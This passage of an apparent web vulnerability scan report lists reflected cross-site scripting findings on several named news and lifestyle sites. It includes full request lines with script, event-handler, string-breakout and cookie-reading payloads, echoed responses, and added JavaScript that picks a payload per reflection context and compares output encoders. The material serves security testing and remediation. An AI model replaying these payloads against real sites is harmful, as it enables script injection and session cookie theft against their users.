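    // Simplification: comments and regex literals are not modelled.
    const re = /<script\b[^>]*>/gi;
    let m, start = 0;
    while ((m = re.exec(before)) !== null) start = m.index + m[0].length;
    let quote = null, escaped = false;
    for (const ch of before.slice(start)) {
      if (quote) {
        if (escaped) escaped = false;
        else if (ch === '\\') escaped = true;
        else if (ch === quote) quote = null;
      } else if (ch === '"' || ch === "'") {
        quote = ch;
      }
    }
    return quote ? { context: 'js_string', quote } : { context: 'js_code', quote: null };
  }

  // Otherwise plain HTML: inside a tag if the last "<" has not been closed yet.
  const lastLt = before.lastIndexOf('<');
  const lastGt = before.lastIndexOf('>');
  if (lastLt > lastGt) {
    let quote = null;
    for (const ch of before.slice(lastLt)) {
      if (quote) { if (ch === quote) quote = null; }
      else if (ch === '"' || ch === "'") quote = ch;
    }
    return quote ? { context: 'attribute', quote } : { context: 'tag', quote: null };
  }
  return { context: 'text', quote: null };
}

// The payload shape the report used against each context it identified.
const PROBE_FOR = {
  text:      '<script>alert(1)</script>',
  attribute: '"><script>alert(1)</script>',
  js_string: '"-alert(1)-"',
};
function suggestProbe(context) {
  return PROBE_FOR[context] || null;
}

// Constructed sample responses, shaped after the fragments the report prints.
const SAMPLES = {
  canonical: '<html><head><link rel="canonical" href="http://www.aisledash.com/?3224aeef255=1" /></head><body></body></html>',
  omniture:  '<html><head><script type="text/javascript"><!--\n' +
             's_265.prop1="Autoblog"; s_265.prop12="http://www.autoblog.com/?fe97bb80e97=1";\n' +
             '//--></script></head><body></body></html>',
  heading:   '<html><body><h1>Results for dafbfb81510</h1></body></html>',
  unquoted:  '<html><body><input type=hidden name=ref value=6681fd48a3a></body></html>',
};

console.log(classifyReflection(SAMPLES.canonical, '3224aeef255')); // attribute, "
console.log(classifyReflection(SAMPLES.omniture, 'fe97bb80e97'));  // js_string, "
console.log(classifyReflection(SAMPLES.heading, 'dafbfb81510'));   // text
console.log(classifyReflection(SAMPLES.unquoted, '6681fd48a3a'));  // tag (unquoted attribute)
```

The "tag" result (an unquoted attribute value) is the one case above that the report never labels; it needs no quote character to break out, only whitespace, which is why a quote-only filter is never a sufficient fix.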
1.230. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.aolhealth.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efb95"><script>alert(1)</script>2a680ac5448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?efb95"><script>alert(1)</script>2a680ac5448=1 HTTP/1.1 Host: www.aolhealth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d49"><script>alert(1)</script>6681fd48a3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /encyclopedia65d49"><script>alert(1)</script>6681fd48a3a/health/ HTTP/1.1 Host: www.aolhealth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f82e"%3b98c2b66b2ac was submitted in the REST URL parameter 2. This input was echoed as 6f82e";98c2b66b2ac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /encyclopedia/health6f82e"%3b98c2b66b2ac/ HTTP/1.1 Host: www.aolhealth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.or ...[SNIP]... kExternalLinks="true"; s_265.channel="us.health"; s_265.prop1="Condition Center | Health Encyclopedia"; s_265.pfxID="hth"; s_265.prop2="Main"; s_265.prop12="http://www.aolhealth.com/encyclopedia/health6f82e";98c2b66b2ac/"; s_265.prop17=""; s_265.prop18=""; s_265.mmxgo=true; s_265.disablepihost=false; s_265.disablepipath=false; s_265.mmxtitle="Health Encyclopedia Main"; s_265.linkInternalFilters="javascript:,aolhealth ...[SNIP]...
1.233. http://www.aolhealth.com/encyclopedia/health/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.aolhealth.com
Path: /encyclopedia/health/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4201</script><a>59aed720f83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /encyclopedia/health/?f4201</script><a>59aed720f83=1 HTTP/1.1 Host: www.aolhealth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16acd"><script>alert(1)</script>eb6bf6a9a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /traffic16acd"><script>alert(1)</script>eb6bf6a9a5f/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Fefb95%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E2a680ac5448%3D1%2F&cb=1412981861 HTTP/1.1 Host: www.aolhealth.com Proxy-Connection: keep-alive Referer: http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=6b8c6d74611ee49286741aa7af24e81b; s_pers=%20s_getnr%3D1297023979342-New%7C1360095979342%3B%20s_nrgvo%3DNew%7C1360095979389%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:25:43 GMT Server: Apache/2.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 43221
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.aolhealth.com/traffic16acd"><script>alert(1)</script>eb6bf6a9a5f/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Fefb95%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E2a680ac5448%3D1%2F&cb=1412981861"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1d4"><img%20src%3da%20onerror%3dalert(1)>2fa0f835869 was submitted in the REST URL parameter 2. This input was echoed as 1d1d4"><img src=a onerror=alert(1)>2fa0f835869 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/egypt-regime-offers-new-concessions-to1d1d4"><img%20src%3da%20onerror%3dalert(1)>2fa0f835869/1550027 HTTP/1.1 Host: www.aolnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7180"%3bd6f4da479f4 was submitted in the REST URL parameter 2. This input was echoed as e7180";d6f4da479f4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/egypt-regime-offers-new-concessions-toe7180"%3bd6f4da479f4/1550027 HTTP/1.1 Host: www.aolnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aba1d"%3bf4c36a25637 was submitted in the REST URL parameter 2. This input was echoed as aba1d";f4c36a25637 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/the-rise-and-fall-of-a-foreclosure-kingaba1d"%3bf4c36a25637/1567480 HTTP/1.1 Host: www.aolnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c010a"><img%20src%3da%20onerror%3dalert(1)>4971c98bf8c was submitted in the REST URL parameter 2. This input was echoed as c010a"><img src=a onerror=alert(1)>4971c98bf8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/the-rise-and-fall-of-a-foreclosure-kingc010a"><img%20src%3da%20onerror%3dalert(1)>4971c98bf8c/1567480 HTTP/1.1 Host: www.aolnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... <meta property="og:url" content="http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-kingc010a"><img src=a onerror=alert(1)>4971c98bf8c/1567480" /> ...[SNIP]...
1.239. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.autoblog.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcaf5"><script>alert(1)</script>04f9219082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?fcaf5"><script>alert(1)</script>04f9219082=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.autoblog.com/?fcaf5"><script>alert(1)</script>04f9219082=1"/> ...[SNIP]...
1.240. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.autoblog.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6c46"-alert(1)-"8a56f02ab0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b6c46"-alert(1)-"8a56f02ab0f=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df24d"><img%20src%3da%20onerror%3dalert(1)>1e853498656 was submitted in the REST URL parameter 3. This input was echoed as df24d"><img src=a onerror=alert(1)>1e853498656 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /2011/02/06df24d"><img%20src%3da%20onerror%3dalert(1)>1e853498656/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="referer" value="http://www.autoblog.com:1080/2011/02/06df24d"><img src=a onerror=alert(1)>1e853498656/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/"> ...[SNIP]...
1.242. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d60"><script>alert(1)</script>1b28de94597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?65d60"><script>alert(1)</script>1b28de94597=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?65d60"><script>alert(1)</script>1b28de94597=1"/> ...[SNIP]...
1.243. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed8f"-alert(1)-"d7b205f65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?2ed8f"-alert(1)-"d7b205f65a=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc04"><a>1436766e6d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/06acc04"><a>1436766e6d8/mahindra-tr40-pickup-only-good-for-19-21-mpg/ HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.autoblog.com/2011/02/06acc04"><a>1436766e6d8/mahindra-tr40-pickup-only-good-for-19-21-mpg/"/> ...[SNIP]...
1.245. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d613"-alert(1)-"fe97bb80e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?5d613"-alert(1)-"fe97bb80e97=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... ternalFilters="javascript:,autoblog.com"; s_265.mmxgo = true; s_265.prop1="Autoblog"; s_265.prop2="Post"; s_265.prop12="http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?5d613"-alert(1)-"fe97bb80e97=1"; s_265.prop16="Mahindra TR40 pickup only good for 19/21 mpg? — Autoblog"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="8"; s_265.prop2 ...[SNIP]...
1.246. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3db4"><script>alert(1)</script>c2ac64e6519 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?b3db4"><script>alert(1)</script>c2ac64e6519=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b24"><x%20style%3dx%3aexpression(alert(1))>ee21d362895 was submitted in the REST URL parameter 3. This input was echoed as f7b24"><x style=x:expression(alert(1))>ee21d362895 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated CSS expression() in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions were dropped from IE8 standards mode onwards) and will not work in other browsers; the underlying attribute injection is still exploitable with an ordinary tag or event-handler payload, as the neighbouring findings show.
Request
GET /2011/02/06f7b24"><x%20style%3dx%3aexpression(alert(1))>ee21d362895/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="referer" value="http://www.autoblog.com:1080/2011/02/06f7b24"><x style=x:expression(alert(1))>ee21d362895/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/"> ...[SNIP]...
1.248. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44a06"-alert(1)-"c678d512fbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?44a06"-alert(1)-"c678d512fbe=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... lters="javascript:,autoblog.com"; s_265.mmxgo = true; s_265.prop1="Autoblog"; s_265.prop2="Post"; s_265.prop12="http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?44a06"-alert(1)-"c678d512fbe=1"; s_265.prop16="Williams FW33 Formula 1 car unveiled, IPO confirmed — Autoblog"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="8"; s_265 ...[SNIP]...
1.249. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9ee"><script>alert(1)</script>325abb71f59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?5b9ee"><script>alert(1)</script>325abb71f59=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 200d9"-alert(1)-"24b08b883ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /life-style200d9"-alert(1)-"24b08b883ad/black-travel HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240378380.1628589389.2600273152; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:16:07 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 30969 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm04 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="life-style200d9"-alert(1)-"24b08b883ad"; s_265.prop2="black-travel"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/life-style200d9\"-alert(1)-\"24b08b883ad/black-travel"; s_265.linkInternalFilters=" ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0d24"-alert(1)-"b7bf6e6c1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /life-style/black-travelb0d24"-alert(1)-"b7bf6e6c1a HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334772668.1997950285.3749250816; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:16:11 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 30965 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld29 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="life-style"; s_265.prop2="black-travelb0d24"-alert(1)-"b7bf6e6c1a"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/life-style/black-travelb0d24\"-alert(1)-\"b7bf6e6c1a"; s_265.linkInternalFilters="javascript:,aol.com,blackvoic ...[SNIP]...
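The "Remediation detail" repeated through these findings says that echoing user data into a script context is hard to do safely, and the responses show why: the same URL is written into a quoted HTML attribute (the canonical link) and into the double-quoted JavaScript string s_265.prop12, and the two blackvoices.com responses above even show the property escaped one way (prop12 with a backslash before each quote) and not at all (prop1). The block below is an added example, not part of the report and not code from any of the sites listed, that renders those two templates with the weak escaping the responses exhibit beside context-correct encoding, and checks each result the way the browser would tokenise it. The payload constants are copied from the report's issue details (1.233's </script><a> and the "-alert(1)-" payloads among them); the function names are ours.

```javascript
// Added example (not from the scan report): the weak escaping seen in the
// responses beside context-correct encoding, checked per output context.

// Payloads taken from the report's issue details.
const PAYLOAD_TEXT  = 'ff2c5<script>alert(1)</script>dafbfb81510';   // echoed between tags
const PAYLOAD_ATTR  = '3418b"><script>alert(1)</script>3224aeef255';  // echoed in href="..."
const PAYLOAD_JS    = 'b6c46"-alert(1)-"8a56f02ab0f';                 // echoed in s_265.prop12="..."
const PAYLOAD_CLOSE = 'f4201</script><a>59aed720f83';                 // echoed in a JS string too

// --- Weak encoders matching what the responses show -------------------------

// Entity-encodes only the tag characters; "-alert(1)-" contains none.
function escapeAngleBracketsOnly(s) {
  return s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Backslash-escapes quotes, as prop12 in the blackvoices.com responses does.
// Keeps the JS string intact, but the HTML tokeniser still sees </script>.
function backslashQuotesOnly(s) {
  return s.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
}

// --- Context-correct encoders ----------------------------------------------

// HTML text and double-quoted attribute values: entity-encode the five
// significant characters. Enough for both of those contexts.
function encodeForHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Double-quoted JavaScript string inside a <script> block: \uXXXX-encode every
// character outside [A-Za-z0-9]. Covers the quote, the backslash, and the
// "<" and "/" that would otherwise let </script> end the element.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// --- Breakout checks modelled on how the browser tokenises each context -----

// A literal " inside href="..." terminates the attribute value.
function breaksAttribute(encoded) {
  return encoded.includes('"');
}

// A start tag in text content creates an element.
function breaksText(encoded) {
  return /<[a-z]/i.test(encoded);
}

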